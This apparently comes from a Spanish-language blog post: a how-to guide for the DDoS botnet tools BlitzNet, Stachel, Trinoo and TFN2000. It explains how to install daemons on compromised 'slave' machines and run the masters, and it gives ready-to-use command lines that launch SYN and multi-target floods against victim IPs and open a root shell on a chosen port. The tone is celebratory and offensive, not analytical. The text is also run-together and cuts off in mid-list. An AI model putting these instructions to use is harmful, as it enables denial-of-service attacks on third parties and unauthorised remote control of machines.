Ahora que es lo nuevo,, si bien todavia no conosco un ataque ddos que se pueda hacer por windows e aqui el emulador de linux se llama cygwin,,, y creo que ya son muchos datos hoy. hasta luego,, para mas informacion claudio_cordoba@hotmail.com
1. BlitzNet : Creado por phreeon , se compone de varios archivosdivididos principalmente en dos partes, los que van en las maquinasesclavas y los que van en el server. En las maquinas esclavas debemoscopiar los archivos blitzd y slice2 , el primero es el daemon quedetecta cuando nos conectamos y el segundo es un programa hecho porotro autor que hace un flood de paquetes syn,cuando ya tengamos los dos archivos en la maquina debemos ejecutarblitzd pasandole dos parametros : el puerto en el que queremos queescuche y una cadena que sera el nombre que use el programa para"esconderse". Y en nuestra maquina debemos tener los archivos blitz,rush. tcl, strobe y shell.list , el primero es el ejecutable delmaster, pero nosotros debemos ejecutar rush.tcl, en shell.list debemosponer la lista de maquinas " infectadas " de la forma ip-port ejemplo192.9.49.33 31337, cuando el programa encuentre una linea en blancodejara de leer shell.list , strobe lo usara el programa para ver sinuestros esclavos estan "vivos".
La forma de ejecutar el master sera asi : ./rush.tcl y podemos poner-check si queremos hacer un scanning para ver cuantos de nuestrosesclavos estan vivos, o si queremos hacer un ataque lo haremos asi :
Por ejemplo con :
./rush.tcl 192.43.9.33 0 1 600 10 600
Donde 192.43.9.33 sera la IP victima , el 0 significa que usara un IPfuente escogido al azar, 1 es el puerto de inicio, 600 el puertofinal, el 10 significa que en cada esclavo creara 10 threads, y elataque durrara 600 segundos. Como ven completamente Mortal !.
Si queremos atacar varios targets al tiempo, lo haremos separando lasIPs con comas, ejemplo :
./rush.tcl 192.43.9.33,192.45.89.76,156.23.56.8 0 1 600 10 600
Y Blitznet distrubuira los targets entre las computadoras "atacantes"
Como ven un programa simple pero eficaz. Creado por phreeon@EFnet delgrupo Legend y el nombre del archivo es Blitznet.tar.gz
2.Stachel : utilidad para hacer syn/udp ddos hecha por Randomizer.Para instalarlo simplemente descomprimimos stachel-yps.tar.gz yejecutamos make linux, este ejcutara un programita que nos preguntarapor una passphrase, introducimos el password y este acabara deinstalarse. Para instalar el daemon en las computadoras victmasdebemos subir los archivos de la carpeta client a la maquina yejecutar el respectivo Make. Ya en nuestra maquina ejecutaremos mservy nos mostrara una pantalla de introduccion donde podremos introducirhelp y veremos :
available commands in this version are:--------------------------------------------------.mtimer .mudp .micmp .msyn .mack .mnul .msort.showalive .madd .mlist .msadd .msrem .help.setusize .setisize .mdie .sprange .mstop .killall.showdead .forceit .left--------------------------------------------------
Como vemos los comandos son muy descriptivos y quizas los masinteresantes son .msyn, micmp, mudp, en resumen una buenta utilidad yuna de las primeras de DDos.
3.Trinoo : Utilidad anonima para hacer smurf ddos . La parte deldaemon esta compuesta solo por un archivo ns.c, asi que simplemente losubimos a la maquina lo compilamos y ejecutamos y listo . La parte delmaster esta como no, en la carpeta Master , asi que simplementeentramos ahi y ejecutamoes make, por cierto este programa al igual questachel usa blowfish como algoritmo para encriptar las comunicaciones.Luego ejecutamos master y estaremos frente a un prompt asi : Trinoo>en el cual podremos introducir los comandos info - bcast - mping -mtimer - dos - mdos - mdie - quit - nslookup
Los mas improtantes son bcast que nos muestra la lista de todos losBroadcast atacantes, dos
4.TFN2000 : Tribe Flood Network 2k - Este es el mejor y mas conocidode los programas analizados, tal vez debe la mayor parte de su fama asu participacion en los famoso ataques de este año a Yahho , Ebay ,etc . Como lo dice su creador Mixter TFN2K es un programa que usandofuncionalidad distribuida de tipo cliente/servidor, stealth, tecnicasde encripcion y numerosas funciones mas permite controlar un grannumera de maquinas remotas para generar por demanda ataques de DOSanonimos y acceso a un shell remoto . Esta ultima funcion extiende lascapacidades de TFN2K para realizar casi cualquier tipo de tarea en unared distribuida. Otra de sus ventajas es su compatibilidad con Win32al poderse compilar con Win32, en realidad su codigo fuente es unaexcelente pieza de estudio para quienes quieran aprender a programassockets, excelente !.Para instalarlo simplemente hacemos un MAKE linux o lo que sea y sitodo va bien tendremos dos archivos td y tfn, td es el server ysimplemente debemos ejecutarlo en un root shell o en nt conprivilegios de administrador. El tfn por supuesto es el cliente y elque nos permitira divertinos un buen rato, lo primero es especificarlos esclavos lo cual lo podemos hacer de dos formas, con la opcion -hespecificamos un solo host, y con la opcion -f podemos especificar unfile en el cual estaran guardados los IPS; el tfn lo debemos llamardandole las IPs victimas separadas con @, la opcion -i nos serviraparadarle valor a los parametros del comando que llamemos y -cX nospermitira usar un total de 10 comandos, puediendo estos ser :
1 : Nos premite controlar que parte de la IP falsa del ataque DOS seraspofeada y que parte no lo sera.
2 : Cambia el tamaño de los paquetes del ataque DOS
3 : Inicia un servidor en el puerto que le indiquemos y que iniciarauna shell root cuando nos conectemos a el.
4 : UDP flood attack. Este ataque sirve para explotar el hecho que porcada paquete UDP que mandemos a un host inalcanzable se respondera unmensaje ICMP "unreachable message"
5 : Syn flood attack. Todos ya conocemos este clasico ataque que serealizara de una forma totalmente anonima.
6 : ICMP echo reply (ping) attack. Este ataque envia grandes peticonesPing con IPs erroneos, provocando la respuesta de paquetes de igualtamaño.
7 : SMURF attack . Envia peticiones Ping con la IP fuente de lavictima a amplificadores broadcast,los cuales responderan con undrastica multiplicacion del tamaño de los paquetes a la victima.
8 : MIX attack. Envia paquetes UDP,SYN e ICMP intercambiados con unarelacion 1:1:1 los cuales pueden ser peligrosos especialmente pararouter o otros servicios de packet forwading.
9 : TARGA3 attack. Envia paquetes al azar basados en protocolos yvalores que se sabe son criticos y peligrosos, y pueden causar enalgunas implementaciones de la pila de IP un fallo total o algun otrocomportamiento indefinido.
10 : Ejecucion remota del comando que le pasemos con la opcion -i. Muyinteresante!.
Asi si por ejemplo queremos hacer un syn flood a 125.36.56.51 lo hacemos asi:
tfn -f hosts.txt 125.36.53.51 -c5
O si queremos cambiar el tamaño de los paquetes lo hacemos asi :
tfn -f hosts.txt -c1 -i4
Y si queremos tener una shell en 192.32.56.25 en el puerto 33137 lohacemos asi :
tfn -f host.txt 192.32.56.25 -c3 -i33137
No hay comentarios.:
Publicar un comentario